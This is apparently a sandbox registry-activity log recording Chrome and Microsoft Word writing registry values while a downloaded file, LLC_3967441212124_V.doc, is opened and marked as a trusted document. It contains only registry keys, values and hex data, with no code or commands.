3ED048E5995181DB6C243FA9DABD7DD52F6E79887693D1F20B23DB4A0BEAA9ED
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
kmendfapggjehodndflmmgagdbamhnfd
00175B8120231631976CA8B862A3416996C9373BA3D289F0619DDA992973DDFA
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
mfehgcgbbipciphmccgaenjidiccnmng
63355C14E8C7DF9A075F2EDDEA6F2807DC8166B83F96F4C975B9B6554C6324D7
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
mhjfbmdgcfjbbpaeojofohoefgiehjai
0E265BFED6F1C7D5F0A9BD790C50BB30E78E959631D51EEBB8BB0DE73E65763C
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
neajdppkdcdipfabeoofebfddakdcjhd
04A45240BDA55E8777FA04357712CA6DD942253A21323E4C7D3CCF769B34BFED
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
nkeimhogjdpnpccoofpliimaahmaaome
5D58C2FED93EFDED578B006CB02BBB8DEC329128E2D098172E1316CDD15254DC
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
nmmhkkegccagdldgiimedpiccmgmieda
0A16D8A1AB14A816F77BA359086A922B5FA1E1EF118102B79F0D57E1DC24451F
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
pjkljhegncpnkpknbcohdijeoejaedia
8849EEF5B00D419B054240CE2F652E75496EB9DB3B80F4B2FAB60BCEECFBBCA3
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
pkedcjkdefgpdelpbcmbmeomcjbeemfm
04AEE98AEE1184424F94EB1C25453BF48E86F3D7DE34EC78DA267FC452223DFD
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000092000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\Enum
Implementing
1C00000001000000E3070A00030009000F0034001D00EE0200000000
2980
chrome.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1330184241
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
nmmhkkegccagdldgiimedpiccmgmieda
56A1345A0F48E56FE62EBB17AB67ED9E0B7E071844022FA25E595F844FF47D77
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Common\Rlz\PTimes
C
D900F2ACB97ED501
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Common\Rlz\RLZs
C1
1C1GCEA_enUA812UA812
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Common\Rlz\RLZs
C2
1C2GCEA_enUA812
2980
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Common\Rlz\RLZs
C7
1C7GCEA_enUA812
2800
chrome.exe
write
HKEY_CURRENT_USER\Software\Google\Chrome\BrowserExitCodes
2980-13215109910083750
259
2304
chrome.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E
LanguageList
en-US
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
o{7
6F7B3700DC0A0000010000000000000000000000
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
2780
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1330184242
2780
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1330184355
2780
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1330184356
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
DC0A00005A6C848FB97ED50100000000
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
0}7
307D3700DC0A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
i~7
697E3700DC0A000006000000010000007200000002000000620000000400000063003A005C00750073006500720073005C00610064006D0069006E005C0064006F0077006E006C006F006100640073005C006C006C0063005F0033003900360037003400340031003200310032003100320034005F0076002E0064006F006300000000000000
2780
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1330184196
2780
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1330184250
2780
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1330184251
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
25
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 1
[F00000000][T01D57EB992138520][O00000000]*C:\Users\admin\Downloads\
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Max Display
25
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 1
[F00000000][T01D57EB992138520][O00000000]*C:\Users\admin\Downloads\LLC_3967441212124_V.doc
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 2
[F00000000][T01D303D755F43A00][O00000000]*C:\Users\admin\Desktop\natureupdates.rtf
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 3
[F00000000][T01D3C89F47FF1980][O00000000]*C:\Users\admin\Desktop\goroyal.rtf
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 4
[F00000000][T01D2BBE35479D180][O00000000]*C:\Users\admin\Desktop\skillsnotes.rtf
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 5
[F00000000][T01D429BB3675B300][O00000000]*C:\Users\admin\Documents\gamesallows.rtf
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 6
[F00000000][T01D3C8AF36FC0180][O00000000]*C:\Users\admin\Documents\piecepicture.rtf
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 7
[F00000000][T01D4D2D38840A300][O00000000]*C:\Users\admin\Documents\soldfederal.rtf
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 8
[F00000000][T01D3C60F32B73600][O00000000]*C:\Users\admin\Documents\donepowered.rtf
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 9
[F00000000][T01D4B71B86025980][O00000000]*C:\Users\admin\Documents\pricingbecause.rtf
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 10
[F00000000][T01D3AA5F922EE180][O00000000]*C:\Users\admin\Documents\ratedinclude.rtf
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 11
[F00000000][T01D41947289BFD80][O00000000]*C:\Users\admin\Documents\musteveryone.rtf
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\11FEE0
11FEE0
04000000DC0A00003000000043003A005C00550073006500720073005C00610064006D0069006E005C0044006F0077006E006C006F006100640073005C004C004C0043005F0033003900360037003400340031003200310032003100320034005F0056002E0064006F006300170000004C004C0043005F0033003900360037003400340031003200310032003100320034005F0056002E0064006F00630000000000010001000000000003993C8EB97ED501E0FE1100E0FE110000000000DB040000000000000000000000000000000000000000000000000000FFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF
2780
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
2780
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1330184241
2780
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1330184242
2780
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1330184241
2780
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1330184242
2780
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1330184270
2780
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1330184271
2780
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1330184243
2780
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1330184244
2780
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1330184243
2780
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1330184244
2780
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1330184272
2780
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1330184273
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
019C826E445A4649A5B00BF08FCC4EEE
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
2780
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1330184274
2780
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1330184275
2780
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1330184276
2780
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1330184277
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
)'7
29273700DC0A000006000000010000007200000002000000620000000400000063003A005C00750073006500720073005C00610064006D0069006E005C0064006F0077006E006C006F006100640073005C006C006C0063005F0033003900360037003400340031003200310032003100320034005F0076002E0064006F006300000000000000
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{F4A3DB51-A9A1-4248-A7DE-16A922407154}\2.0
Microsoft Forms 2.0 Object Library
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{F4A3DB51-A9A1-4248-A7DE-16A922407154}\2.0\FLAGS
6
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{F4A3DB51-A9A1-4248-A7DE-16A922407154}\2.0\0\win32
C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{F4A3DB51-A9A1-4248-A7DE-16A922407154}\2.0\HELPDIR
C:\Users\admin\AppData\Local\Temp\Word8.0
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}
Font
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}
IDataAutoWrapper
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}
IReturnInteger
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}
IReturnBoolean
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}
IReturnString
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}
IReturnSingle
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}
IReturnEffect
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}
IControl
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}
Controls
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}
IOptionFrame
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}
_UserForm
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}
ControlEvents
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}
FormEvents
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}
OptionFrameEvents
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}
ILabelControl
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}
ICommandButton
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}
IMdcText
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}
IMdcList
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}
IMdcCombo
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}
IMdcCheckBox
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}
IMdcOptionButton
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}
IMdcToggleButton
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}
IScrollbar
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}
Tab
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}
Tabs
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}
ITabStrip
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}
ISpinbutton
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{4C599243-6926-101B-9992-00000B65C6F9}
IImage
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLSubmitButton
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLImage
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLReset
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLCheckbox
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLOption
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLText
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLHidden
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLPassword
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLSelect
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLTextArea
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}
LabelControlEvents
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}
CommandButtonEvents
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}
MdcTextEvents
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}
MdcListEvents
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}
MdcComboEvents
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}
MdcCheckBoxEvents
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}
MdcOptionButtonEvents
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}
MdcToggleButtonEvents
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}
ScrollbarEvents
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}
TabStripEvents
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}
SpinbuttonEvents
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}
ImageEvents
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}
WHTMLControlEvents
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents1
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents2
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents3
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents4
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents5
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents6
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents7
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents9
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents10
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}
IPage
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}
Pages
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}
IMultiPage
2780
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}
MultiPageEvents
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\123E98
123E98
04000000DC0A00003000000043003A005C00550073006500720073005C00610064006D0069006E005C0044006F0077006E006C006F006100640073005C004C004C0043005F0033003900360037003400340031003200310032003100320034005F0056002E0064006F006300170000004C004C0043005F0033003900360037003400340031003200310032003100320034005F0056002E0064006F00630000000000010000000000000003993C8EB97ED501983E1200983E120000000000DB040000000000000000000000000000000000000000000000000000FFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents\TrustRecords
%USERPROFILE%/Downloads/LLC_3967441212124_V.doc
E5234A85B97ED5010068C46108000000F86E8F0101000000
2780
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\11FEE0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
0
2780
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
0
2780
WINWORD.EXE
write
